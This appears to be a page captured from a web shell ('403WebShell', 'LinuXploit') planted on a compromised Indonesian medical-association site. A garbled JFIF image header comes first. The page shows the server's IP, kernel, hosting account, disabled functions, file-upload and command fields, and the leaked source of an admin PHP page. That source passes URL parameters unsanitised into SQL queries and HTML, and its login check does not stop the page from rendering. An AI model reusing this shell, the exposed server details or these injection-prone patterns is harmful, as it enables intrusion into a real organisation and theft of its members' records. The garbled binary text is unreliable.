JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.131  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/progres2.php
<?php  include "koneksi.php";

  session_start();

	// cek apakah yang mengakses halaman ini sudah login

	if($_SESSION['status']<>"login"){

		header("location:location:../login.php");

	}

?>



<!DOCTYPE html>

<html lang="en">



<head>



  <meta charset="utf-8">

  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <meta name="description" content="">

  <meta name="author" content="">

<head>

    <title>IDI Kota Bandung</title>

    <!-- Custom fonts for this template-->

  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">

  <link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">



  <!-- Custom styles for this template-->

  <link href="css/sb-admin-2.min.css" rel="stylesheet">

  

  <!-- Custom styles for this page -->

  <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet">

  

  	<style type="text/css">

	body{

		font-family: roboto;

		font-size: 11px;

	}





table {

margin: 0 auto;

border-collapse: collapse;

}



tbody {

color: #000;

}



table td {

padding: 5px 10px;

border: 1px solid #e0e0e0;

font: normal 11px Tahoma, Geneva, sans-serif;



}



table tr {

font: normal 11px Tahoma, Geneva, sans-serif;

}









/* untuk ukuran layar 700px kebawah */

@media screen and (max-width: 780px) {

	

	.header, 

	.footer{

		text-align: center;

	}

	.left {

		width: auto;

		float: none;

	}

	

	.middle {

		width: auto;

		float: none;

	}

	

	.right {

		width: auto;

		float: none;

	}



}



	</style>

    

    <style type="text/css">

/* Table demo-table */

		table {

			margin: auto;

			font-family: "Lucida Sans Unicode", "Lucida Grande", "Segoe Ui";

			font-size: 11px;

		}



		

		.table-container {

	overflow: auto;

}



/* side bar jqery*/





@media only screen and (max-width: 480px) {

    

 	table {

		width: 100%;

	}

	thead th.column-primary {

		width: 100%;

	}



	thead th:not(.column-primary) {

		display:none;

	}

	

	th[scope="row"] {

		vertical-align: top;

		

	}

	

	td {

		display: block;

		width: auto;

		text-align: right;

	}

	thead th::before {

		text-transform: uppercase;

		font-weight: bold;

		content: attr(data-header);

	}

	thead th:first-child span {

		display: none;

	}

	td::before {

		float: left;

		text-transform: uppercase;

		font-weight: bold;

		content: attr(data-header);

	}  

    

}







	

	</style>

</head>



<body id="page-top">

<body>



<!-- Page Wrapper -->

  <div id="wrapper">

  	<?php include "sidebar.php"; ?>

    

    <!-- Content Wrapper -->

    <div id="content-wrapper" class="d-flex flex-column">



      <!-- Main Content -->

      <div id="content">

      

      <?php include "topbar.php";?>

      

      	<!-- Begin Page Content -->

        <div class="container-fluid">

          <!-- DataTales Example -->

          <div class="card shadow mb-4">

            <div class="card-header py-3">

              <h6 class="m-0 font-weight-bold text-primary">List Post</h6>

            </div>





<!DOCTYPE html>

<html lang="en">

<head>

  <title>IDI kota Bandung</title>

  <meta charset="utf-8">

  <meta name="viewport" content="width=device-width, initial-scale=1">

  <!-- css bootstrap -->

  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>

	

	

 <style type="text/css">

<!--

font-family: Arial, Helvetica, sans-serif;

font-size: 10px;	



	 table {

margin: 0 auto;

border-collapse: collapse;

}



tbody {

color: #000;

}



table td {

padding: 5px 10px;

border: 1px solid #e0e0e0;

font: normal 11px Tahoma, Geneva, sans-serif;



}



table tr {

font: normal 11px Tahoma, Geneva, sans-serif;

}





	</style>	

	

	

</head>

<body>



 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>

 <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" />

 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

</head>

<body>



 <div class="container">

  <nav class="navbar navbar-inverse">

   <div class="container-fluid">

    <div class="navbar-header">

     <a class="navbar-brand" href="#">Notifikasi Progress Update</a>

    </div>

    <ul class="nav navbar-nav navbar-right">

     <li class="dropdown">

      <a href="#" class="dropdown-toggle" data-toggle="dropdown"><span class="label label-pill label-danger count" style="border-radius:10px;"></span> <span class="glyphicon glyphicon-bell" style="font-size:18px;"></span></a>

      <ul class="dropdown-menu"></ul>

     </li>

    </ul>

   </div>

  </nav>

	</div>

	

	

<div class="container">

 

    <center><h4>Table Daftar Progres Sudah Validasi 1 dan Validasi 2  </h4><center> 

    <h4><b>IDI kota Bandung</b></h4>

  </div>

  <!--Panel Form pencarian -->

  <div class="row">

    <div class="col-md-8">

      <div class="panel panel-default">

        <div class="panel-heading"><b>Pencarian</b></div>

        <div class="panel-body">

          <form class="form-inline" >

            <div class="form-group">

              <select class="form-control" id="Kolom" name="Kolom" required="">

                <?php

                  $kolom=(isset($_GET['Kolom']))? $_GET['Kolom'] : "";

                ?>

                <option value="nmlead" <?php if ($kolom=="Nama") echo "selected"; ?>>Nama</option>

                <option value="perihal" <?php if ($kolom=="Alamat") echo "selected";?>>Tujuan Rekom</option>

              </select>

            </div>

            <div class="form-group">

              <input type="text" class="form-control" id="KataKunci" name="KataKunci" placeholder="Kata kunci.." required="" value="<?php if (isset($_GET['KataKunci']))  echo $_GET['KataKunci']; ?>">

            </div>

            <button type="submit" class="btn btn-primary">Cari</button>

            <a href="progres2.php" class="btn btn-danger">Reset</a>

          </form>

        </div>

      </div>

    </div>

  </div>

  <!-- Tabel data Siswa -->

  <table class="table table-striped table-bordered table-hover">

	   <table class="table table-bordered" id="dataTable" width="90%" cellspacing="0">

    <thead>

      <tr>

        <th>No.</th>

	       <th>No Rekom</th>

		   <th>Pemohon</th>

		   <th>Jenis rekom</th>

		   <th>Status Anggota</th>

		  

		   <th>validasi1</th>

		   <th>validasi2</th>

		   <th>validasi3</th>

		   <th>Note</th>

		   <th>Note dari Anggota</th>

		    <th>Note dari Ketua</th>

		   <th>Action</th>
  <th>Cek Surat</th>
		

		  

		  

      </tr>

    </thead>  

    <tbody>

      <?php

      include "koneksi.php";

     

      $page = (isset($_GET['page']))? (int) $_GET['page'] : 1;

      

      $kolomCari=(isset($_GET['Kolom']))? $_GET['Kolom'] : "";

     

      $kolomKataKunci=(isset($_GET['KataKunci']))? $_GET['KataKunci'] : "";



      // Jumlah data per halaman

      $limit = 10;



      $limitStart = ($page - 1) * $limit;

      

      //kondisi jika parameter pencarian kosong

      if($kolomCari=="" && $kolomKataKunci==""){

        $SqlQuery = mysqli_query($konek, "SELECT * FROM h_registrasi where status2 <> 'finish' AND data='chek' AND verifikasi1<>'' order by noreko,nmlead,verifikasi1 desc  LIMIT ".$limitStart.",".$limit);

		  

		  

		  

      }else{

        //kondisi jika parameter kolom pencarian diisi

        $SqlQuery = mysqli_query($konek, "SELECT * FROM h_registrasi where status2 <> 'finish' AND data='chek' AND verifikasi1<>'' AND $kolomCari LIKE '%$kolomKataKunci%' LIMIT ".$limitStart.",".$limit);

      }

      

      $no = $limitStart + 1;

      

      while($row = mysqli_fetch_array($SqlQuery)){ 

		  

		  	//  $str=  $row['mbstr'];

//			  $date = new DateTime($str);

//			  $mbstr = $date->format('d-m-Y');

//		

//		      $tgliuran=  $row['tgliuran'];

//			  $date = new DateTime($tgliuran);

//			  $iuran= $date->format('d-m-Y');

//	 

//	          $iuran2=  $row['iuran'];

//			  $date = new DateTime($iuran2);

//			  $iuran2= $date->format('d-m-Y');

//		  

//		      $vtime2=  $row['v3time'];

//			  $date = new DateTime($vtime2);

//			  $v3time= $date->format('d-m-Y H:i:s');

		  

		  

      ?>

               <tr>

		  <td><?php echo $no++; ?></td>

		  <td><?php echo $row['noreko']?></td>

		

		  <td><?php echo $row['nmlead']?></td>  
				   
	<?php
						if ($row['perihal']=='rekomendasi_Pengantar_SIP'){
	?>			
				 <td><?php echo 'rekomendasi_Pengantar Puskesmas'?></td>
					
						 
		<?php		
			}else{
			?>	
				
				  <td><?php echo $row['perihal']?></td>
		<?php		
			}	 
			?>				   
		
	<td>

		    <?php 

			IF($row['stat_ang'] =='non' ){					

		 echo  'Non Anggota' ;		  

	   }else{		    

		  echo   'Anggota' ;			    

		   }

		   ?>

		   </td>

		

         <td><?php echo $row['verifikasi1']?></td>

         <td><?php echo $row['verifikasi2']?></td>

		 <td><?php echo $row['verifikasi3']?></td>

		 <td><?php echo $row['keterangan']?></td>

		 <td>

			 

			 	<?php 

								IF( $row['tgl_note'] == '0000-00-00 00:00:00' || $row['tgl_note'] == '00 0000') {

										 ?>                                            

					 <?php echo '-' ?><br><br>

						  

						  <?php 									

									}else{

					 ?>					  		

						

						 <?php echo $row['tgl_note']?><br><br>

							  <?php 									

								}

					 ?>			

			 

			

			 

			 

			 

			 

			 

			 <?php echo $row['note']?></td>

		 <td><?php echo $row['note5']?></td>

	

		

		<td><a class='btn btn-success btn-sm' href='upd_sip2.php?noreg=<?php echo $row['noreg']; ?>&npm=<?php echo $row['npm']; ?>'>Cek</a></td>
	<td>			
					
					 <a class='btn btn-danger btn-sm' href='cetak_rekom.php?noreg=<?php echo $row['noreg']; ?>&npm=<?php echo $row['npm']; ?>'>Cek Surat</a>
				
	     </td>	
        </tr>

      <?php           

      }

      ?>

    </tbody>      

  </table>

  <div align="right">

    <ul class="pagination">

      <?php

        // Jika page = 1, maka LinkPrev disable

        if($page == 1){ 

      ?>        

        <!-- link Previous Page disable --> 

        <li class="disabled"><a href="#">Previous</a></li>

      <?php

        }

        else{ 

          $LinkPrev = ($page > 1)? $page - 1 : 1;  



          if($kolomCari=="" && $kolomKataKunci==""){

          ?>

            <li><a href="progres2.php?page=<?php echo $LinkPrev; ?>">Previous</a></li>

       <?php     

          }else{

        ?> 

          <li><a href="progres2.php?Kolom=<?php echo $kolomCari;?>&KataKunci=<?php echo $kolomKataKunci;?>&page=<?php echo $LinkPrev;?>">Previous</a></li>

         <?php

           } 

        }

      ?>



      <?php

        //kondisi jika parameter pencarian kosong

        if($kolomCari=="" && $kolomKataKunci==""){

         // $SqlQuery = mysqli_query($konek, "SELECT * FROM h_registrasi where status2='valid' and verifikasi2='valid'");

			

		  $SqlQuery = mysqli_query($konek, "SELECT * FROM h_registrasi where status2 <> 'finish' AND data='chek' AND verifikasi1<>'' order by noreko,nmlead,verifikasi1 desc");	

			

			

			

			

			

        }else{

          //kondisi jika parameter kolom pencarian diisi

          $SqlQuery = mysqli_query($konek, "SELECT * FROM h_registrasi where status2<>'finish' AND data='chek' AND verifikasi1<>'' AND $kolomCari LIKE '%$kolomKataKunci%' order by noreko,nmlead,verifikasi1 desc");

        }     

		

		

		

		

		

		

      

        //Hitung semua jumlah data yang berada pada tabel Sisawa

        $JumlahData = mysqli_num_rows($SqlQuery);

        

        // Hitung jumlah halaman yang tersedia

        $jumlahPage = ceil($JumlahData / $limit); 

        

        // Jumlah link number 

        $jumlahNumber = 5; 



        // Untuk awal link number

        $startNumber = ($page > $jumlahNumber)? $page - $jumlahNumber : 1; 

        

        // Untuk akhir link number

        $endNumber = ($page < ($jumlahPage - $jumlahNumber))? $page + $jumlahNumber : $jumlahPage; 

        

        for($i = $startNumber; $i <= $endNumber; $i++){

          $linkActive = ($page == $i)? ' class="active"' : '';



          if($kolomCari=="" && $kolomKataKunci==""){

      ?>

          <li<?php echo $linkActive; ?>><a href="progres2.php?page=<?php echo $i; ?>"><?php echo $i; ?></a></li>



      <?php

        }else{

          ?>

          <li<?php echo $linkActive; ?>><a href="progres2.php?Kolom=<?php echo $kolomCari;?>&KataKunci=<?php echo $kolomKataKunci;?>&page=<?php echo $i; ?>"><?php echo $i; ?></a></li>

          <?php

        }

      }

      ?>

      

      <!-- link Next Page -->

      <?php       

       if($page == $jumlahPage){ 

      ?>

        <li class="disabled"><a href="#">Next</a></li>

      <?php

      }

      else{

        $linkNext = ($page < $jumlahPage)? $page + 1 : $jumlahPage;

       if($kolomCari=="" && $kolomKataKunci==""){

          ?>

            <li><a href="progres2.php?page=<?php echo $linkNext; ?>">Next</a></li>

       <?php     

          }else{

        ?> 

           <li><a href="progres2.php?Kolom=<?php echo $kolomCari;?>&KataKunci=<?php echo $kolomKataKunci;?>&page=<?php echo $linkNext; ?>">Next</a></li>

      <?php

        }

      }

      ?>

    </ul>

  </div>



 <div style="font-weight:bold;">

        Paging

        <?php

            for ($i=1; $i<=$jumlahPage ; $i++){

        ?>

            <a href="d_finish.php?page=<?php echo $i; ?>" style="text-decoration:none">   <u><?php echo $i; ?></u></a>

		

	

		

        <?php

            }

        ?>

    </div>

<br><br>

Total Data : <?php echo $JumlahData ?> dan  Total Halaman : <?php echo $jumlahPage ?>

</div>



</body>

	 

	<script type="text/javascript">

$(document).ready(function(){

// updating the view with notifications using ajax

function load_notification(view = '')

{

 $.ajax({

  url:"fetch.php",

  method:"POST",

  data:{view:view},

  dataType:"json",

  success:function(data)

  {

   $('.dropdown-menu').html(data.notification);

   if(data.unseen_notification > 0)

   {

    $('.count').html(data.unseen_notification);

   }

  }

 });

}



load_notification();

// submit form and get new records

$('#comment_form').on('submit', function(event){

 event.preventDefault();

 if($('#subject').val() != '' && $('#comment').val() != '')

 {

  var form_data = $(this).serialize();

  $.ajax({

   url:"insert.php",

   method:"POST",

   data:form_data,

   success:function(data)

   {

    $('#comment_form')[0].reset();

    load_notification();

   }

  });

 }

 else

 {

  alert("Subject & Comments Harus Diisi");

 }

});

// load new notifications

$(document).on('click', '.dropdown-toggle', function(){

 $('.count').html('');

 load_notification('yes');

});

setInterval(function(){

 load_notification();

}, 5000);

});

</script> 

	 

	 

	 

</html>



		 

					

<!-- proses edit data -->



		

   <?php include "footer.php";?>



    </div>

    <!-- End Main Content -->

    </div>

    <!-- End Page Wrapper -->

   <!-- Bootstrap core JavaScript-->

  <script src="vendor/jquery/jquery.min.js"></script>

  <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>



  <!-- Core plugin JavaScript-->

  <script src="vendor/jquery-easing/jquery.easing.min.js"></script>



  <!-- Custom scripts for all pages-->

  <script src="js/sb-admin-2.min.js"></script>



  <!-- Page level plugins -->

  <script src="vendor/datatables/jquery.dataTables.min.js"></script>

  <script src="vendor/datatables/dataTables.bootstrap4.min.js"></script>



  <!-- Page level custom scripts -->

  <script src="js/demo/datatables-demo.js"></script>

</div>	

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit